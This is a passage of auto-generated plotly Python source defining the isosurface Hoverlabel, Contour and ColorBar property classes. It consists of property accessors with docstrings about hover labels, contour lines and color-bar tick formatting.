@property
def bgcolor(self):
"""
Sets the background color of the hover labels for this trace
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self['bgcolor']
@bgcolor.setter
def bgcolor(self, val):
self['bgcolor'] = val
# bgcolorsrc
# ----------
@property
def bgcolorsrc(self):
"""
Sets the source reference on plot.ly for bgcolor .
The 'bgcolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['bgcolorsrc']
@bgcolorsrc.setter
def bgcolorsrc(self, val):
self['bgcolorsrc'] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the border color of the hover labels for this trace.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self['bordercolor']
@bordercolor.setter
def bordercolor(self, val):
self['bordercolor'] = val
# bordercolorsrc
# --------------
@property
def bordercolorsrc(self):
"""
Sets the source reference on plot.ly for bordercolor .
The 'bordercolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['bordercolorsrc']
@bordercolorsrc.setter
def bordercolorsrc(self, val):
self['bordercolorsrc'] = val
# font
# ----
@property
def font(self):
"""
Sets the font used in hover labels.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly.graph_objs.isosurface.hoverlabel.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
colorsrc
Sets the source reference on plot.ly for color
.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for
family .
size
sizesrc
Sets the source reference on plot.ly for size
.
Returns
-------
plotly.graph_objs.isosurface.hoverlabel.Font
"""
return self['font']
@font.setter
def font(self, val):
self['font'] = val
# namelength
# ----------
@property
def namelength(self):
"""
Sets the default length (in number of characters) of the trace
name in the hover labels for all traces. -1 shows the whole
name regardless of length. 0-3 shows the first 0-3 characters,
and an integer >3 will show the whole name if it is less than
that many characters, but if it is longer, will truncate to
`namelength - 3` characters and add an ellipsis.
The 'namelength' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|numpy.ndarray
"""
return self['namelength']
@namelength.setter
def namelength(self, val):
self['namelength'] = val
# namelengthsrc
# -------------
@property
def namelengthsrc(self):
"""
Sets the source reference on plot.ly for namelength .
The 'namelengthsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['namelengthsrc']
@namelengthsrc.setter
def namelengthsrc(self, val):
self['namelengthsrc'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
"""
def __init__(
self,
arg=None,
align=None,
alignsrc=None,
bgcolor=None,
bgcolorsrc=None,
bordercolor=None,
bordercolorsrc=None,
font=None,
namelength=None,
namelengthsrc=None,
**kwargs
):
"""
Construct a new Hoverlabel object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Hoverlabel
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
Returns
-------
Hoverlabel
"""
super(Hoverlabel, self).__init__('hoverlabel')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Hoverlabel
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Hoverlabel"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (hoverlabel as v_hoverlabel)
# Initialize validators
# ---------------------
self._validators['align'] = v_hoverlabel.AlignValidator()
self._validators['alignsrc'] = v_hoverlabel.AlignsrcValidator()
self._validators['bgcolor'] = v_hoverlabel.BgcolorValidator()
self._validators['bgcolorsrc'] = v_hoverlabel.BgcolorsrcValidator()
self._validators['bordercolor'] = v_hoverlabel.BordercolorValidator()
self._validators['bordercolorsrc'
] = v_hoverlabel.BordercolorsrcValidator()
self._validators['font'] = v_hoverlabel.FontValidator()
self._validators['namelength'] = v_hoverlabel.NamelengthValidator()
self._validators['namelengthsrc'
] = v_hoverlabel.NamelengthsrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('align', None)
self['align'] = align if align is not None else _v
_v = arg.pop('alignsrc', None)
self['alignsrc'] = alignsrc if alignsrc is not None else _v
_v = arg.pop('bgcolor', None)
self['bgcolor'] = bgcolor if bgcolor is not None else _v
_v = arg.pop('bgcolorsrc', None)
self['bgcolorsrc'] = bgcolorsrc if bgcolorsrc is not None else _v
_v = arg.pop('bordercolor', None)
self['bordercolor'] = bordercolor if bordercolor is not None else _v
_v = arg.pop('bordercolorsrc', None)
self['bordercolorsrc'
] = bordercolorsrc if bordercolorsrc is not None else _v
_v = arg.pop('font', None)
self['font'] = font if font is not None else _v
_v = arg.pop('namelength', None)
self['namelength'] = namelength if namelength is not None else _v
_v = arg.pop('namelengthsrc', None)
self['namelengthsrc'
] = namelengthsrc if namelengthsrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Contour(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
Sets the color of the contour lines.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['color']
@color.setter
def color(self, val):
self['color'] = val
# show
# ----
@property
def show(self):
"""
Sets whether or not dynamic contours are shown on hover
The 'show' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['show']
@show.setter
def show(self, val):
self['show'] = val
# width
# -----
@property
def width(self):
"""
Sets the width of the contour lines.
The 'width' property is a number and may be specified as:
- An int or float in the interval [1, 16]
Returns
-------
int|float
"""
return self['width']
@width.setter
def width(self, val):
self['width'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
Sets the color of the contour lines.
show
Sets whether or not dynamic contours are shown on hover
width
Sets the width of the contour lines.
"""
def __init__(self, arg=None, color=None, show=None, width=None, **kwargs):
"""
Construct a new Contour object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.Contour
color
Sets the color of the contour lines.
show
Sets whether or not dynamic contours are shown on hover
width
Sets the width of the contour lines.
Returns
-------
Contour
"""
super(Contour, self).__init__('contour')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.Contour
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.Contour"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (contour as v_contour)
# Initialize validators
# ---------------------
self._validators['color'] = v_contour.ColorValidator()
self._validators['show'] = v_contour.ShowValidator()
self._validators['width'] = v_contour.WidthValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('color', None)
self['color'] = color if color is not None else _v
_v = arg.pop('show', None)
self['show'] = show if show is not None else _v
_v = arg.pop('width', None)
self['width'] = width if width is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class ColorBar(_BaseTraceHierarchyType):
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the color of padded area.
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['bgcolor']
@bgcolor.setter
def bgcolor(self, val):
self['bgcolor'] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the axis line color.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['bordercolor']
@bordercolor.setter
def bordercolor(self, val):
self['bordercolor'] = val
# borderwidth
# -----------
@property
def borderwidth(self):
"""
Sets the width (in px) or the border enclosing this color bar.
The 'borderwidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['borderwidth']
@borderwidth.setter
def borderwidth(self, val):
self['borderwidth'] = val
# dtick
# -----
@property
def dtick(self):
"""
Sets the step in-between ticks on this axis. Use with `tick0`.
Must be a positive number, or special strings available to
"log" and "date" axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick number. For
example, to set a tick mark at 1, 10, 100, 1000, ... set dtick
to 1. To set tick marks at 1, 100, 10000, ... set dtick to 2.
To set tick marks at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special values;
"L<f>", where `f` is a positive number, gives ticks linearly
spaced in value (but not position). For example `tick0` = 0.1,
`dtick` = "L0.5" will put ticks at 0.1, 0.6, 1.1, 1.6 etc. To
show powers of 10 plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is ignored for "D1" and
"D2". If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval between
ticks to one day, set `dtick` to 86400000.0. "date" also has
special values "M<n>" gives ticks spaced by a number of months.
`n` must be a positive integer. To set ticks on the 15th of
every third month, set `tick0` to "2000-01-15" and `dtick` to
"M3". To set ticks every 4 years, set `dtick` to "M48"
The 'dtick' property accepts values of any type
Returns
-------
Any
"""
return self['dtick']
@dtick.setter
def dtick(self, val):
self['dtick'] = val
# exponentformat
# --------------
@property
def exponentformat(self):
"""
Determines a formatting rule for the tick exponents. For
example, consider the number 1,000,000,000. If "none", it
appears as 1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If "SI", 1G. If
"B", 1B.
The 'exponentformat' property is an enumeration that may be specified as:
- One of the following enumeration values:
['none', 'e', 'E', 'power', 'SI', 'B']
Returns
-------
Any
"""
return self['exponentformat']
@exponentformat.setter
def exponentformat(self, val):
self['exponentformat'] = val
# len
# ---
@property
def len(self):
"""
Sets the length of the color bar This measure excludes the
padding of both ends. That is, the color bar length is this
length minus the padding on both ends.
The 'len' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['len']
@len.setter
def len(self, val):
self['len'] = val
# lenmode
# -------
@property
def lenmode(self):
"""
Determines whether this color bar's length (i.e. the measure in
the color variation direction) is set in units of plot
"fraction" or in *pixels. Use `len` to set the value.
The 'lenmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['fraction', 'pixels']
Returns
-------
Any
"""
return self['lenmode']
@lenmode.setter
def lenmode(self, val):
self['lenmode'] = val
# nticks
# ------
@property
def nticks(self):
"""
Specifies the maximum number of ticks for the particular axis.
The actual number of ticks will be chosen automatically to be
less than or equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
The 'nticks' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self['nticks']
@nticks.setter
def nticks(self, val):
self['nticks'] = val
# outlinecolor
# ------------
@property
def outlinecolor(self):
"""
Sets the axis line color.
The 'outlinecolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['outlinecolor']
@outlinecolor.setter
def outlinecolor(self, val):
self['outlinecolor'] = val
# outlinewidth
# ------------
@property
def outlinewidth(self):
"""
Sets the width (in px) of the axis line.
The 'outlinewidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['outlinewidth']
@outlinewidth.setter
def outlinewidth(self, val):
self['outlinewidth'] = val
# separatethousands
# -----------------
@property
def separatethousands(self):
"""
If "true", even 4-digit integers are separated
The 'separatethousands' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['separatethousands']
@separatethousands.setter
def separatethousands(self, val):
self['separatethousands'] = val
# showexponent
# ------------
@property
def showexponent(self):
"""
If "all", all exponents are shown besides their significands.
If "first", only the exponent of the first tick is shown. If
"last", only the exponent of the last tick is shown. If "none",
no exponents appear.
The 'showexponent' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self['showexponent']
@showexponent.setter
def showexponent(self, val):
self['showexponent'] = val
# showticklabels
# --------------
@property
def showticklabels(self):
"""
Determines whether or not the tick labels are drawn.
The 'showticklabels' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['showticklabels']
@showticklabels.setter
def showticklabels(self, val):
self['showticklabels'] = val
# showtickprefix
# --------------
@property
def showtickprefix(self):
"""
If "all", all tick labels are displayed with a prefix. If
"first", only the first tick is displayed with a prefix. If
"last", only the last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
The 'showtickprefix' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self['showtickprefix']
@showtickprefix.setter
def showtickprefix(self, val):
self['showtickprefix'] = val
# showticksuffix
# --------------
@property
def showticksuffix(self):
"""
Same as `showtickprefix` but for tick suffixes.
The 'showticksuffix' property is an enumeration that may be specified as:
- One of the following enumeration values:
['all', 'first', 'last', 'none']
Returns
-------
Any
"""
return self['showticksuffix']
@showticksuffix.setter
def showticksuffix(self, val):
self['showticksuffix'] = val
# thickness
# ---------
@property
def thickness(self):
"""
Sets the thickness of the color bar This measure excludes the
size of the padding, ticks and labels.
The 'thickness' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['thickness']
@thickness.setter
def thickness(self, val):
self['thickness'] = val
# thicknessmode
# -------------
@property
def thicknessmode(self):
"""
Determines whether this color bar's thickness (i.e. the measure
in the constant color direction) is set in units of plot
"fraction" or in "pixels". Use `thickness` to set the value.
The 'thicknessmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['fraction', 'pixels']
Returns
-------
Any
"""
return self['thicknessmode']
@thicknessmode.setter
def thicknessmode(self, val):
self['thicknessmode'] = val
# tick0
# -----
@property
def tick0(self):
"""
Sets the placement of the first tick on this axis. Use with
`dtick`. If the axis `type` is "log", then you must take the
log of your starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when `dtick`=*L<f>* (see
`dtick` for more info). If the axis `type` is "date", it should
be a date string, like date data. If the axis `type` is
"category", it should be a number, using the scale where each
category is assigned a serial number from zero in the order it
appears.
The 'tick0' property accepts values of any type
Returns
-------
Any
"""
return self['tick0']
@tick0.setter
def tick0(self, val):
self['tick0'] = val
# tickangle
# ---------
@property
def tickangle(self):
"""
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the tick
labels vertically.
The 'tickangle' property is a angle (in degrees) that may be
specified as a number between -180 and 180. Numeric values outside this
range are converted to the equivalent value
(e.g. 270 is converted to -90).
Returns
-------
int|float
"""
return self['tickangle']
@tickangle.setter
def tickangle(self, val):
self['tickangle'] = val
# tickcolor
# ---------
@property
def tickcolor(self):
"""
Sets the tick color.
The 'tickcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
